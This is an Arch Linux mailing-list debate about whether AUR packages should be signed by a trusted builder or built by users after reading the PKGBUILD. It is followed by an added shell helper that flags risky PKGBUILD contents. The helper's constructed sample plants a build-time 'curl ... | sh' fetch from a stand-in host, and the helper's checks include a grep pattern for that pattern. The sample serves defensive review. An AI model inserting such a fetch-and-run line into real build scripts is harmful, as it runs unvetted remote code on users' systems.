On 04/11/2014 07:45 PM, Taylor Hornby wrote:
> On 04/11/2014 04:27 PM, Daniel Wallace wrote:
>> So you're saying... blindly trusting someone else that is unknown
>> to build and blindly sign a package is more secure than you
>> downloading the pkgbuild with cower or something, looking at the
>> PKGBUILD, and then using makepkg...
>
>> How is that?
>
> No, that person has to be trusted not to actively sign malicious
> binaries of their own creation and to keep their private key secret.
>
> I'm saying: A single trusted person blindly building and signing
> packages is more secure than everyone blindly building and signing
> packages.
>
> It's a single opportunity for attack on everyone versus an opportunity
> for an attack each time a user installs a package from the AUR. The
> former is more detectable after-the-fact (thus much less likely to be
> done by an intelligence agency like the NSA) and can be done in a safer
> environment (cable internet connection in the USA vs. a WiFi hotspot in
> Syria).
>
> The process could also involve grabbing the files (or hashes) through
> different Tor exit nodes and comparing them to make sure they're all the
> same, and there's no attacker messing with the local Internet
> connection.
>
>
>> Second, where do you propose the computing time and the storage
>> space comes from to support this kind of repository?
>
>
> Would it really be that much? How do other distributions manage it?
>
> -Taylor
>

Salutations,

The point of Arch is that security is mainly a user concern. Arch doesn't target users who would just blindly install packages from the AUR without reading the PKGBUILD first, or reading the source code as another step. If one doesn't know how to compile and/or modify the code they are using, they really shouldn't be using the code. While other distributions do this, I strongly disagree with it.

Arch users should read the wiki on how to compile with makepkg before attempting to install packages from the AUR. By the way, installing a package can be as simple as "$ makepkg -s -r -i" or more complicated if further dependencies must be compiled. Security through a messiah is as useful as security through obscurity.

Regards,
Mark
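Mark's advice is to read the PKGBUILD before running makepkg. As an added example that is not part of this thread, the POSIX shell helper below lists a PKGBUILD's sources and flags three things a reviewer should look at before building: a checksum of SKIP, a source fetched over plain http, and code downloaded at build time and piped to a shell. The PKGBUILD is a constructed sample (not a real AUR package) and the function names `sample_pkgbuild_path`, `array_body` and `review_pkgbuild` are my own; the helper greps the file rather than sourcing it, because sourcing a PKGBUILD executes it.

```shell
# Constructed sample PKGBUILD (not a real AUR package; the hash is a placeholder)
# seeded with three things a reviewer should catch: a plain-http source,
# a SKIP checksum, and a network fetch piped to a shell inside package().
SAMPLE_PKGBUILD='pkgname=example-tool
pkgver=1.2.3
pkgrel=1
source=("http://example.invalid/example-tool-1.2.3.tar.gz"
        "git+https://example.invalid/example-tool.git")
sha256sums=("SKIP"
            "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855")
build() {
  cd "$pkgname-$pkgver"
  make
}
package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
  curl -s http://example.invalid/post-install.sh | sh
}'

# Write the sample to a temp file and print its path.
sample_pkgbuild_path() {
    f=$(mktemp) && printf '%s\n' "$SAMPLE_PKGBUILD" > "$f" && echo "$f"
}

# Print the lines of an array assignment such as source=(...) or sha256sums=(...).
array_body() {
    sed -n "/^$2=(/,/)/p" "$1"
}

# review_pkgbuild FILE: list sources, then print one "finding:" line per
# issue. The file is never sourced, because sourcing a PKGBUILD runs it.
review_pkgbuild() {
    array_body "$1" source | grep -o '"[^"]*"' | tr -d '"' |
        sed 's/^/source: /'
    # makepkg does not verify a download whose checksum is SKIP
    if array_body "$1" sha256sums | grep -q '"SKIP"'; then
        echo "finding: SKIP in sha256sums, download is not verified"
    fi
    # a plain-http source can be altered on the wire before makepkg sees it
    if array_body "$1" source | grep -q '"http://'; then
        echo "finding: source fetched over http://"
    fi
    # code fetched at build time and piped to a shell bypasses the checksums
    if grep -Eq '(curl|wget) .*\| *(sh|bash)' "$1"; then
        echo "finding: build-time network fetch piped to a shell"
    fi
}
review_pkgbuild "$(sample_pkgbuild_path)"
```

The findings are prompts for the reader, not a verdict: a SKIP entry for a git source is normal when validpgpkeys covers it, so the point is to know what to look at, then read the file.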